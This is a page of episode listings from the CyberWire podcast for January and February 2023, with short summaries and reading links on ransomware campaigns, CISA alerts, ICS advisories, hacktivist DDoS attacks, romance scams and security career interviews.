Russian-linked malware was close to putting U.S. electric, gas facilities ‘offline’ last year (POLITICO)

2022 ICS/OT Cybersecurity Year in Review Executive Summary (Dragos)

What’s love got to do with it? 4 in 5 Valentine’s Day-themed spam emails are scams, Bitdefender Antispam Lab warns (Hot for Security)

Known Exploited Vulnerabilities. Fool’s gold. Hacktivists come in both dissident and loyal varieties. Naming and shaming the shameless. Feb 13, 2023

CISA adds to its Known Exploited Vulnerabilities Catalog. Cl0p claims responsibility for GoAnywhere exploitation. Victims mine for gold; attackers use pig butchering tactics. Hacktivists disrupt Iranian television during Revolution Day observances. Killnet claims a DDoS attack against NATO earthquake relief efforts. CyberWire UK Correspondent Carole Theriault asks what can we learn from the recent Roomba privacy snafu? Rick Howard looks at first principles we considered along the way. And can you name and shame the shameless?

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/29

Selected reading.

CISA Adds Three Known Exploited Vulnerabilities to Catalog (CISA)

GoAnywhere MFT Zero-Day Exploitation Linked to Ransomware Attacks (SecurityWeek)

Clop ransomware claims it breached 130 orgs using GoAnywhere zero-day (BleepingComputer)

Fool’s Gold: dissecting a fake gold market pig-butchering scam (Sophos)

Iranian State TV Hacked During President's Speech on Revolution Day (HackRead)

Russian hackers disrupt Turkey-Syria earthquake relief (The Telegraph)

Hacking marketplace emerges from Killnet partnership, seeks pro-Russia donations (SC Media)

Russian Government evaluates the immunity to hackers acting in the interests of Russia (Security Affairs)

Russia’s Ransomware Gangs Are Being Named and Shamed (WIRED)

Jaden Dicks: It is never too early to start. [CyberVista intern] [Career Notes] Feb 12, 2023

Jaden Dicks, a new intern at CyberVista, a company that merged with CyberWire to become N2K Networks, shares his story as a young man growing up trying to get into the cyber community. From a very young age, Jaden hoped to become part of the cybersecurity field, He recalls growing up constantly being surrounded by technology, and now with the help of Urban Alliance, Jaden was able to secure this internship with CyberVista. Urban Alliance is a nonprofit that connects young adults with paid work experiences, such as internships to help them bridge the gaps between education and the workforce. Jaden hopes that this internship will help him further advance his career and help him to pursue his goals of working in cyber. He also shares advice to younger people like him who are looking to branch out and start working toward your goals, even as a teenager, and what has helped him to find his rhythm. We thank Jaden for sharing his story with us.

Knocking down the legs of the industrial security triad. [Research Saturday] Feb 11, 2023

Pascal Ackerman, OT Security Strategist from Guidepoint Security, joins Dave to discuss his work on discovering a vulnerability in the integrity of common HMI client-server protocol. This research is a Proof of Concept (PoC) attack on the integrity of data flowing across the industrial network with the intention of intercepting, viewing, and even manipulating values sent to (and from) the HMI, ultimately trying to trick the user into making a wrong decision, ultimately affecting the proper operation of the process.

In this research, they are targeting Rockwell Automation’s FactoryTalk View SE products, trying to highlight the lack of integrity and confidentiality on the production network and the effect that has on the overall security of the production environment.

The research can be found here:

GuidePoint Security researcher discovers vulnerability in the integrity of common HMI client-server protocol

US, RoK agencies outline DPRK ransomware. Reddit breached. ICS and IIoT issues. It’s almost Valentine’s Day. Have you noticed? (The hoods have.) Feb 10, 2023

US and Republic of Korea agencies outline the DPRK ransomware threat. Reddit is breached. CISA releases six ICS advisories. Flaws are found in IIoT devices. Dinah Davis from Arctic Wolf shares cybersecurity stats every IT professional should know. Our guest is Kayla Williams from Devo autonomous SOCs. And, it’s almost Valentine’s Day. Have you noticed? (The hoods have.)

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/28

Selected reading.

#StopRansomware - Ransomware Attacks on Critical Infrastructure Fund DPRK Espionage Activities (CISA)

#StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities (CISA)

U.S., South Korean Agencies Partner to #StopRansomware Threat from DPRK (National Security Agency/Central Security Service)

US and South Korea accuse North Korea of using hospital ransoms to fund more hacking (The Record from Recorded Future News)

North Korea using healthcare ransomware attacks to fund further cybercrime, feds say (SC Media)

U.S., South Korea Warn of North Korean Ransomware Threats (Bank Info Security)

r/reddit - We had a security incident. Here’s what we know. (reddit)

Hackers breach Reddit to steal source code and internal data (BleepingComputer)

Reddit Breached With Stolen Employee Credentials (Dark Reading)

Reddit Says It Was Hacked But That You Don't Need to Worry. Probably. (Gizmodo)

Control By Web X-400, X-600M (CISA)

LS ELECTRIC XBC-DN32U (CISA)

Johnson Controls System Configuration Tool (SCT) (CISA)

Horner Automation Cscape Envision RV (CISA)

Omron SYSMAC CS/CJ/CP Series and NJ/NX Series (CISA)

ARC Informatique PcVue (CISA)

Industrial Wireless IoT - The direct path to your Level 0 (Otorio)

Critical Infrastructure at Risk from New Vulnerabilities Found in Wireless IIoT Devices (The Hacker News)

Romance scammers’ favorite lies exposed (Federal Trade Commission)

New FTC Data Reveals Top Lies Told by Romance Scammers (Federal Trade Commission)

Romance scammers could cause unhappy Valentine’s Day (Washington Post)

Love Bytes (Georgia State News Hub)

As V-Day nears: Romance scams cost victims $1.3B last year (Register)

Michigan AG warns of cybersecurity risks after data breach of gaming sites (mlive)

CISA Alert AA23-040A – #StopRansomware: ransomware attacks on critical infrastructure fund DPRK malicious cyber activities. [CISA Cybersecurity Alerts] Feb 10, 2023

CISA, NSA, FBI, the US Department of Health and Human Services, the Republic of Korea National Intelligence Service, and the Republic of Korea Defense Security Agency are issuing this alert to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities.

AA23-040A Alert, Technical Details, and Mitigations

CISA’s North Korea Cyber Threat Overview and Advisories webpage.

Stairwell provided a YARA rule to identify Maui ransomware, and a Proof of Concept public RSA key extractor at the following link: https://www.stairwell.com/news/threat-research-report-maui-ransomware/

See Stopransomware.gov, a whole-of-government approach, for ransomware resources and alerts.

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

Cyberespionage, from war floating to phishing. An update on ESXiArgs. Fresh sanctions against ransomware operators, and more takedowns may be in the offing. Feb 09, 2023

War-floating. A phishing campaign pursues Ukrainian and Polish targets. Pakistan's navy is under cyberattack. A new criminal threat-actor uses screenshots for recon. ESXiArgs is widespread, but its effects are still being assessed. The UK and US issue joint sanctions against Russian ransomware operators. Robert M. Lee from Dragos addresses attacks to electrical substations. Our guest is Denny LeCompte from Portnox discussing IoT security segmentation strategies. And is LockBit next on law enforcement’s wanted list?

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/27

Selected reading.

Chinese Balloon Had Tools to Collect Communications Signals, U.S. Says (New York Times)

UAC-0114 Campaign Targeting Ukrainian and Polish Gov Entitities (The State Cyber Protection Centre of the State Service of Special Communication and Information Protection of Ukraine)

NewsPenguin, a Previously Unknown Threat Actor, Targets Pakistan with Advanced Espionage Tool (BlackBerry)

Screentime: Sometimes It Feels Like Somebody's Watching Me (Proofpoint)

Florida state court system, US, EU universities hit by ransomware outbreak (Reuters).

No evidence global ransomware hack was by state entity, Italy says (Reuters)

Ransomware campaign stirs worry despite uncertain impact (Washington Post)

VMware Security Response Center (vSRC) Response to 'ESXiArgs' Ransomware Attacks (VMware Security Blog)

CISA and FBI Release ESXiArgs Ransomware Recovery Guidance (CISA)

United States and United Kingdom Sanction Members of Russia-Based Trickbot Cybercrime Gang (U.S. Department of the Treasury)

Ransomware criminals sanctioned in joint UK/US crackdown on international cyber crime (National Crime Agency)

CISA Alert AA23-039A – ESXiArgs ransomware virtual machine recovery guidance. [CISA Cybersecurity Alerts] Feb 09, 2023

CISA and the FBI are releasing this alert in response to the ongoing ransomware campaign, known as “ESXiArgs.” Malicious actors are exploiting known vulnerabilities in VMware ESXi servers that are likely running unpatched and out-of-service or out-of-date versions of VMware ESXi software to gain access and deploy ransomware.

AA23-039A Alert, Technical Details, and Mitigations

CISA has released an ESXiArgs recovery script at github.com/cisagov/ESXiArgs-Recover

VMware Security Response Center (vSRC) Response to 'ESXiArgs' Ransomware Attack…

Enes Sonmez and Ahmet Aykac, YoreGroup Tech Team: decrypt your crypted files in…

See Stopransomware.gov, a whole-of-government approach, for ransomware resources and alerts.

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

An ICS update from CISA. Ransomware notes: LockBit, Clop, and ESXiArgs. Vulnerability in Toyota’s GSPIMS. Two new Russian cyberespionage efforts hit Ukraine. And a direction for US privacy policy. Feb 08, 2023

CISA releases an ICS security advisory affecting a smart facility system. LockBit threatens to release Royal Mail data tomorrow. Cl0p ransomware expands to Linux-based systems. A vulnerability is identified in Toyota's GSPIMS. There’s an ESXiArgs update: new trackers and mitigation tools are available. Russia is running two new cyberespionage campaigns against Ukraine. Our guest is Roya Gordon from Nozomi Networks discusses the ICS Threat Landscape. And The Washington Post’s Tim Starks provides analysis on last night’s State of the Union.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/26

Selected reading.

CISA Releases One Industrial Control Systems Advisory (CISA)

LockBit group threatens to publish stolen Royal Mail data tomorrow (Computing)

Cl0p Ransomware Targets Linux Systems with Flawed Encryption | Decryptor Available (SentinelOne)

Hacking into Toyota’s global supplier management network (Eaton Works)

Researcher breaches Toyota supplier portal with info on 14,000 partners (BleepingComputer)

Vulnerability Provided Access to Toyota Supplier Management Network (SecurityWeek)

CISA Releases ESXiArgs Ransomware Recovery Script (CISA)

ESXiArgs Ransomware Campaign Targets VMWare ESXi Vulnerability (SecurityScorecard)

Graphiron: New Russian Information Stealing Malware Deployed Against Ukraine (Symantec)

Remcos software deployed in spying attempt on Ukraine’s government, CERT says (The Record from Recorded Future News)

The State of the Union was light on cybersecurity (Washington Post)

Biden calls for action on privacy rights in State of the Union (CyberScoop)

Update: VMware ESXi exploitations. Super Bowl cyber risks. Scalping bots. The curious case of the Moscow billboards. Feb 07, 2023

VMware ESXi exploitations. Super Bowl cyber risks. Scalping bots. The curious case of the Moscow billboards. Joe Carrigan tracks pig butchering apps in online app stores. Our guest is David Liebenberg from Cisco Talos, to discuss incident response trends. And, in sportsball, it’s gonna be the Chiefs by a couple of hat tricks, or something.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/25

Selected reading.

Ransomware Hits Unpatched VMware Systems: 'Send Money Within 3 Days' (Virtualization Review)

Massive ransomware attack targets VMware ESXi servers worldwide (CSO Online)

CISA steps up to help VMware ESXi ransomware victims (SC Media)

‘Massive’ new ESXiArgs ransomware campaign has compromised thousands of victims (The Record from Recorded Future News)

Have you clicked “Report Junk” lately on your #mobile device? (Proofpoint)

CyRC special report: Secure apps? Don’t bet on it (Synopsys)

DataDome’s Inaugural E-Commerce Holiday Bot & Online Fraud Report Reveals the US as the Top Source of Bot Attacks (DataDome)

Darknet drug market BlackSprut openly advertises on billboards in Moscow (The Record from Recorded Future News)

Unpatched VMware ESXi instances attacked. Okatpus is back. Update on LockBit’s ransomware attack on ION. Charlie Hebdo hack attributed to Iran. Feb 06, 2023

New ransomware exploits a VMware ESXi vulnerability. Roasted 0ktapus squads up. LockBit says ION paid the ransom. Russian cyber auxiliaries continue attacks against healthcare organizations. Attribution on the Charlie Hebdo attack. Deepen Desai from Zscaler describes recent activity by Ducktail malware. Rick Howard looks at cyber threat intelligence. And the top US cyber diplomat says his Twitter account was hacked.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/24

Selected reading.

Ransomware Gang in Trading Hack Says Ransom Was Paid (Bloomberg)

Regulators weigh in on ION attack as LockBit takes credit (Register)

Russian hackers launch attack on City of London infrastructure (The Armchair Trader)

Ransomware attack on data firm ION could take days to fix -sources (Reuters)

Linux version of Royal Ransomware targets VMware ESXi servers (BleepingComputer)

Ransomware scum attack old VMWare ESXi vulnerability (Register)

Italy sounds alarm on large-scale computer hacking attack (Reuters)

Italy's TIM suffers internet connection problems (Reuters)

Italy sounds alarm on large-scale computer hacking attack (Jerusalem Post)

Italian National Cybersecurity Agency (ACN) warns of massive ransomware campaign targeting VMware ESXi servers (Security Affairs)

Campagne d’exploitation d’une vulnérabilité affectant VMware ESXi (CERT-FR)

VMSA-2021-0002 (VMware)

CERT-FR warns of a new wave of ransomware attacks targeting VMware ESXi servers (Security Affairs)

‘0ktapus’ hackers are back and targeting tech and gaming companies, says leaked report (TechCrunch)

Customizable new DDoS service already appears to have fans among pro-Russia hacking groups (The Record from Recorded Future News)

Russian Hackers Take Down At Least 17 U.S. Health System Websites (MedCity News)

Tallahassee Memorial HealthCare, Florida, has taken IT systems offline after cyberattack (Security Affairs)

Iran responsible for Charlie Hebdo attacks - Microsoft On the Issues (Microsoft On the Issues)

Piratage de « Charlie Hebdo » : un groupe iranien à la manœuvre, selon Microsoft (Le Monde)

Iran behind hack of French magazine Charlie Hebdo, Microsoft says (Reuters)

Microsoft attributes Charlie Hebdo data leak to Iran-linked NEPTUNIUM APT (Security Affairs

America's top cyber diplomat says his Twitter account was hacked (CNN)

“Shift Left”: A case for threat-informed pentesting. [CyberWire-X] Feb 05, 2023

Penetration testing is a vital part of a robust security program, but the traditional pentesting model is in a rut. Assessments happen infrequently, the scope is often very broad, and the report is usually overwhelming. What if you could increase the overall ROI of your pentesting program and avoid these limitations? Every penetration test should have specific goals. Coverage of the MITRE ATT&CK framework or the OWASP Top Ten is a great start, but a pentest could provide exponential value by applying a more strategic approach.

In this episode of CyberWire-X, the CyberWire’s Rick Howard and Dave Bittner discuss what it means to "shift left" with your penetration testing by working on a threat-informed test plan with guests and Hash Table members Bob Turner, the Field CSO of Fortinet, Etay Maor, the Senior Director for Security Strategy at Cato Networks, and Dan DeCloss, the Founder and CEO of our episode sponsor PlexTrac.

Yasmin Abdi: Find your community. [Security Engineer] [Career Notes] Feb 05, 2023

Yasmin Abdi, a Security Engineering Manager at Snapchat and the CEO and Founder of NoHack, sits down to share her story on how she got to be in her amazing current roles. From a young age, Yasmin was fascinated by the overlap of cybersecurity and crime and law. In her time in college, she was able to intern at big tech companies like Snapchat, Google, and Facebook. She decided to stick with Snapchat, which had the security aspect and security composure that she wanted. In her role at Snapchat, she gets to work with her team to help take down all kinds of bad content and keep up the platform’s integrity, and found she fell in love with the work along the way. Yasmin shares the sage advice to grow your community as much as you can, saying to"form a community of like-minded people. People that you can bounce ideas off of, people that can help support you when times are low. Find mentors, find people that you aspire to be like, and really find that community of people." We thank Yasmin for sharing her story.

Can ransomware turn machines against us? [Research Saturday] Feb 04, 2023

Tom Bonner and Eoin Wickens from HiddenLayer's SAI Team to discuss their research on weaponizing machine learning models with ransomware. Researchers at HiddenLayer’s SAI Team have developed a proof-of-concept attack for surreptitiously deploying malware, such as ransomware or Cobalt Strike Beacon, via machine learning models.

The attack uses a technique currently undetected by many cybersecurity vendors and can serve as a launchpad for lateral movement, deployment of additional malware, or the theft of highly sensitive data. In this research the team raising awareness by demonstrate how easily an adversary can deploy malware through a pre-trained ML model.

The research can be found here:

WEAPONIZING MACHINE LEARNING MODELS WITH RANSOMWARE

Cyberespionage, and ransomware as misdirection. A new Python-based supply chain attack. Traffic on the Static Expressway. KillNet continues to plague hospitals. And Telegram may be compromised. Feb 03, 2023

CISA has released six ICS Advisories. A look at a North Korean cyberespionage campaign. ChatGPT and its attack potential. A new Python-based supply chain attack. There’s traffic on the Static Expressway: ClickFunnels seen in use for redirection. KillNet continues its campaign against hospitals. Ransomware as misdirection for cyberespionage. Part two of my conversation with Kathleen Smith of ClearedJobs.Net discussing trends in the cleared space. Our guest is Eric Bassier of Quantum talking about the multi-layered approach to ransomware protection. And Russian surveillance extends to Telegram chats.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/23

Selected reading.

Delta Electronics DIAScreen (CISA)

Mitsubishi Electric GOT2000 Series and GT SoftGOT2000 (CISA)

Baicells Nova (CISA)

Delta Electronics DVW-W02W2-E2 (CISA)

Delta Electronics DX-2100-L1-CN (CISA)

Mitsubishi Electric GT SoftGOT2000 (CISA)

No Pineapple! –DPRK Targeting of Medical Research and Technology Sector (WithSecure)

Hackers linked to North Korea targeted Indian medical org, energy sector (The Record from Recorded Future News)

North Korean hackers stole research data in two-month-long breach (BleepingComputer)

ChatGPT May Already Be Used in Nation State Cyberattacks, Say IT Decision Makers in BlackBerry Global Research (BlackBerry)

Supply Chain Attack by New Malicious Python Package, “web3-essential” ((Frotinet)

Leveraging ClickFunnels to Bypass Security Services (Avanan)

Report: 'KillNet' targeting hospitals in countries helping Ukraine in war efforts (Becker’s Hospital Review)

Intelligence agency says ransomware group with Russian ties poses 'an enduring threat' to Canada (CBC)

Les ransomwares, couverture des groupes APT pour du cyber-espionnage (Le Monde Informatique)

The Kremlin Has Entered the Chat (WIRED)

Cisco fixes vulnerabilities in ICS appliances. NIST’s anti-phishing guidelines. OneNote exploitation. HeadCrab malware. Recent actions by Russian threat actors. Trends in state-directed cyber ops. Feb 02, 2023

Cisco patches a command injection vulnerability. NIST issues antiphishing guidance. HeadCrab malware's worldwide distribution campaign. The Gamaredon APT is more interested in collection than destruction. Kathleen Smith of ClearedJobs.Net looks at hiring trends in the cleared community. Bennett from Signifyd describes the fraud ring that’s launched a war on commerce against U.S. merchants. And trends in cyberattacks by state-sponsored actors.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/22

Selected reading.

Command-Injection Bug in Cisco Industrial Gear Opens Devices to Complete Takeover (Dark Reading)

Phishing Resistance – Protecting the Keys to Your Kingdom (NIST)

OneNote Documents Increasingly Used to Deliver Malware | Proofpoint UK (Proofpoint)

HeadCrab: A Novel State-of-the-Art Redis Malware in a Global Campaign (Aquasec)

Another UAC-0010 Story (The State Cyber Protection Centre of the State Service of Special Communication and Information Protection of Ukraine)

Russia-backed hacker group Gamaredon attacking Ukraine with info-stealing malware (The Record from Recorded Future News)

City of London traders hit by Russia-linked cyber attack (The Telegraph)

ChristianaCare recovers from cyberattack, restores website service (6abc Philadelphia)

Nation-State Threats and the Rise of Cyber Mercenaries: Exploring the Microsoft Digital Defense Report (CSO Online)

Microsoft Digital Defense Report 2022 (Microsoft Security)

How the C2C market sustains ransomware gangs. In Russia’s war, intelligence services deploy wipers, and hacktivist auxiliaries handle the DDoS. And a look into other corners of the cyber underworld. Feb 01, 2023

Microsoft tallies more than a hundred ransomware gangs. Sandworm's NikoWiper hits Ukraine's energy sector. Mobilizing cybercriminals in a hybrid war. Firebrick Ostrich and business email compromise. Telegram is used for sharing stolen data and selling malware. Crypto scams find their way into app stores. Bryan Vorndran of the FBI Cyber Division outlines the services the FBI provides during an incident response. Ann Johnson from Afternoon Cyber Tea speaks with actor producer Tim Murck about the intersection of cyber awareness and storytelling. And we are shocked - shocked! - that there are fraudulent cyber professional credentials circulating online.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/21

Selected reading.

Microsoft: Over 100 threat actors deploy ransomware in attacks (BleepingComputer)

SocGholish: A Tale of FakeUpdates (Reliaquest)

ESET APT Activity Report T3 2022 (WeLiveSecurity)

Pro-Russian DDoS attacks raise alarm in Denmark, U.S. (The Record from Recorded Future News)

ChristianaCare's website restored after attack; pro-Russia 'hacktivist' group takes credit (Delaware News Journal)

Univ. of Iowa Hospitals website possibly hit by cyberattack (KCRG)

Cyber attack causes problems with UM Health websites (The Detroit News)

How the war in Ukraine has strengthened the Kremlin's ties with cybercriminals (The Record from Recorded Future News)

Dark Covenant 2.0: Cybercrime, the Russian State, and War in Ukraine (Recored Future)

Russia’s cyberwar against Ukraine offers vital lessons for the West (Atlantic Council)

BEC Group Uses Secondary Personas & Lookalike Domains in Third-Party… (Abnormal Intelligence)

Telegram's place in the cyber underworld. (CyberWire)

Crypto scams found in the App Store. (CyberWire)

Exposure to third-party risk. (CyberWire)

Cyber certification deceit. (CyberWire)

The cybercriminal labor market and the campaigns it’s supporting. Russia’s Killnet is running DDoS attacks against US hospitals, but Russia says, hey, it’s the real victim here. Jan 31, 2023

Some perspective on the cybercriminal labor market. DocuSign is impersonated in a credential-harvesting campaign. Social engineering pursues financial advisors. Killnet is active against the US healthcare sector. Mr. Security Answer Person John Pescatore has thoughts on cryptocurrency. Ben Yelin and I debate the limits of section 230. And, hey, who’s the real victim in cyberspace? A hint: probably not you, Mr. Putin.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/20

Selected reading.

Perspectives on the cybercriminal labor market. (CyberWire).

IT specialists search and recruitment on the dark web (Securelist)

Cybercrime job ads on the dark web pay up to $20k per month (BleepingComputer)

Report on hackers' salaries shows poor wages for developers (Register)

Cybercrime groups offer six-figure salaries, bonuses, paid time off to attract talent on dark web (CyberScoop)

Application security risks. (CyberWire)

Survey gives insight into new app security challenges (Cisco App Dynamics)

DocuSign impersonated in credential phishing attack. (CyberWIre)

Breaking the Impersonation: Armorblox Stops DocuSign Attack (Armorblox)

"Pig butchering" and financial advisor impersonation scams. (CyberWire)

No Blocking, No Issue: The Curious Ecosystem of Financial Advisor Impersonation Scams (Domain Tools)

Ukraine at D+341: Killnet hits US hospitals.(CyberWire)

HC3 TLP Clear Analyst Note: Pro-Russian Hacktivist Group Threat to HPH Sector (American Hospital Association)

HHS, AHA Warn of Surge in Russian DDoS Attacks on Hospitals (Gov Info Security)

Russian hackers allegedly take down Duke University Hospital’s website (Carolina Journal)

The Evolution of DDoS: Return of the Hacktivist (FSISAC)

Russia becomes target of West’s coordinated aggression in cyberspace — MFA (TASS)

Criminal evolutions, disgruntled insiders, and gangsta wannabes. New wiper attacks hit Ukrainian targets, with less effect than the first rounds early last year. And support your local hacktivist? Jan 30, 2023

Gootloader's evolution. Yandex source code leaked (and Yandex blames a rogue insider). New GRU wiper malware is active against Ukraine. Latvia reports cyberattacks by Gamaredon. Russia and the US trade accusations of malign cyber activity. A hacktivist auxiliary's social support system. Deepen Desai from Zscaler describes the Lilithbot malware. Rick Howard looks at chaotic simians. And wannabes can be a nuisance, too: LockBit impersonators are seen operating in northern Europe.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/19

Selected reading.

Welcome to Goot Camp: Tracking the Evolution of GOOTLOADER Operations (Mandiant)

Yandex denies hack, blames source code leak on former employee (BleepingComputer)

Hackers use new SwiftSlicer wiper to destroy Windows domains (BleepingComputer)

Sandworm APT targets Ukraine with new SwiftSlicer wiper (Security Affairs)

Ukraine: Sandworm hackers hit news agency with 5 data wipers (BleepingComputer)

Ukraine Links Media Center Attack to Russian Intelligence (BankInfoSecurity)

Latvia confirms phishing attack on Ministry of Defense, linking it to Russian hacking group (The Record from Recorded Future News)

Russia knows US recruits hackers, trains Ukrainian IT-army — Deputy Foreign Minister (TASS)

Taking down the Hive ransomware gang. (CyberWire)

US puts a $10m bounty on Hive while Russia shuts down access (Register)

Exploring Killnet’s Social Circles (Radware)

Copycat Criminals mimicking Lockbit gang in northern Europe (Security Affairs)

Charlie Moore: Pilot to head honcho in cyber. [Cyber Command] [Career Notes[ Jan 29, 2023

Our guest, Charlie Moore, is a recently retired USAF Lieutenant General who sits down to share his story from flying high in the air to becoming a bigwig in the cyber community. He was most recently the Deputy Commander of the United States Cyber Command, and also spent part of his career as a human factors engineer working on human interfaces for fighter aircraft. When he first began his Air Force career, he was a member of the last class entering into the Academy that was not issued desktop computers. Charlie discusses how this changed as the year went on and how that impacted his career both in and out of the military. Charlie worked for different companies over the years to further his career and his goals, and discusses how his flying career has helped him and says, "I was extremely passionate about the flying aspect of my career for 25 years and I became even more passionate about operating in this space." We thank Charlie for sharing his story with us.

Interview with the AI, part one. [Special Editions] Jan 29, 2023

Cybersecurity interview with ChatGPT.

In part one of CyberWire’s Interview with the AI, Brandon Karpf interviews ChatGPT about topics related to cybersecurity. Rick Howard joins Brandon to analyze the conversation and discuss potential use cases for the cybersecurity community.

ChatGPT is a chatbot launched by OpenAI and built on top of OpenAI’s GPT-3 family of large language models.

Cyber questions answered by ChatGPT in part one of the interview.

What were the most significant cybersecurity incidents up through 2021?
What leads you to characterize these specific events as significant?
What were the specific technical vulnerabilities associated with these incidents?
Who were the cyber actors involved in each of these attacks?
Do you think it's valuable to attribute cyber attacks to specific actors?

Flagging firmware vulnerabilities. [Research Saturday] Jan 28, 2023

Roya Gordon from Nozomi Networks sits down with Dave to discuss their research on "Vulnerabilities in BMC Firmware Affect OT/IoT Device Security." Researchers at Nozomi Networks has revealed that there are thirteen vulnerabilities that affect BMCs of Lanner devices based on the American Megatrends (AMI) MegaRAC SP-X.

The research states "By abusing these vulnerabilities, an unauthenticated attacker may achieve Remote Code Execution (RCE) with root privileges on the BMC, completely compromising it and gaining control of the managed host." As well as mentioning what patches could be in the future to help fix these vulnerabilities.

The research can be found here:

Vulnerabilities in BMC Firmware Affect OT/IoT Device Security – Part 1

An update on the Hive ransomware takedown. More DDoS from Killnet. Advisories from CISA, and an addition to the Known Exploited Vulnerabilties Catalog. Jan 27, 2023

An update on the takedown of the Hive ransomware gang, plus insights from CrowdStrike’s Adam Meyers. If you say you’re going to unleash the Leopards, expect a noisy call from Killnet. Our guest is ExtraHop CISO Jeff Costlow talking about nation-state attackers in light of ongoing Russian military operations. CISA has released eight ICS advisories, and the agency has also added an entry to its Known Exploited Vulnerabilities Catalog.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/18

Selected reading.

Cybercriminals stung as HIVE infrastructure shut down (Europol)

U.S. Department of Justice Disrupts Hive Ransomware Variant (U.S. Department of Justice)

Director Christopher Wray’s Remarks at Press Conference Announcing the Disruption of the Hive Ransomware Group (Federal Bureau of Investigation)

Taking down the Hive ransomware gang. (CyberWire)

US hacks back against Hive ransomware crew (BBC News)

Cyberattacks Target Websites of German Airports, Admin (SecurityWeek)

Delta Electronics CNCSoft ScreenEditor (CISA)

Econolite EOS (CISA)

Snap One Wattbox WB-300-IP-3 (CISA)

Sierra Wireless AirLink Router with ALEOS Software (CISA).

Mitsubishi Electric MELFA SD/SQ series and F-series Robot Controllers (CISA)

Rockwell Automation products using GoAhead Web Server (CISA)

Landis+Gyr E850 (CISA)

Mitsubishi Electric MELSEC iQ-F, iQ-R Series (CISA)

CISA Has Added One Known Exploited Vulnerability to Catalog (CISA)

Remote monitoring and management tools abused. Russian and Iranian cyberespionage reported. The world according to the CIO. And if volume is your secret, maybe look for a better secret. Jan 26, 2023

Joint advisory warns of remote monitoring and management software abuse. Iranian threat actors reported active against a range of targets. UK's NCSC warns of increased risk of Russian and Iranian social engineering attacks. A look at trends, as seen by CIOs. Carole Theriault ponders health versus privacy with former BBC guru Rory Cellan Jones. Kyle McNulty, host of the Secure Ventures podcast shares lessons from the cybersecurity startup community. And the DRAGONBRIDGE spam network is disrupted.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/17

Selected reading.

CISA, NSA, and MS-ISAC Release Advisory on the Malicious Use of RMM Software (CISA)

Protecting Against Malicious Use of Remote Monitoring and Management Software (CISA)

CISA: Federal agencies hacked using legitimate remote desktop tools (BleepingComputer)

'Malicious' cyber attacks launched by groups connected to Iran's regime (ABC)

Abraham's Ax Likely Linked to Moses Staff (Secureworks)

SEABORGIUM and TA453 continue their respective spear-phishing campaigns against targets of interest (NCSC)

NCSC: Russian and Iranian hackers targeting UK politicians, journalists (Computing)

State of the CIO Study 2023: CIOs cement leadership role (Foundry)

U.S. says it 'hacked the hackers' to bring down ransomware gang, helping 300 victims (Reuters)

Over 50,000 instances of DRAGONBRIDGE activity disrupted in 2022 (Google TAG)

CISA Alert AA23-025A – Protecting against malicious use of remote monitoring and management software. [CISA Cybersecurity Alerts] Jan 26, 2023

CISA, NSA, and the MS-ISAC are releasing this alert to warn network defenders about malicious use of legitimate remote monitoring and management software.

AA23-025A Alert, Technical Details, and Mitigations

For a downloadable copy of IOCs, see AA23-025.stix

Silent Push uncovers a large trojan operation featuring Amazon, Microsoft, Geek Squad, McAfee, Norton, and Paypal domains

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

TA444 and crypto theft on behalf of the Dear Successor. CryptoAPI spoofing vulnerability described. New Python-based malware campaign. User headspace. Tanks vs. hacktivists. Jan 25, 2023

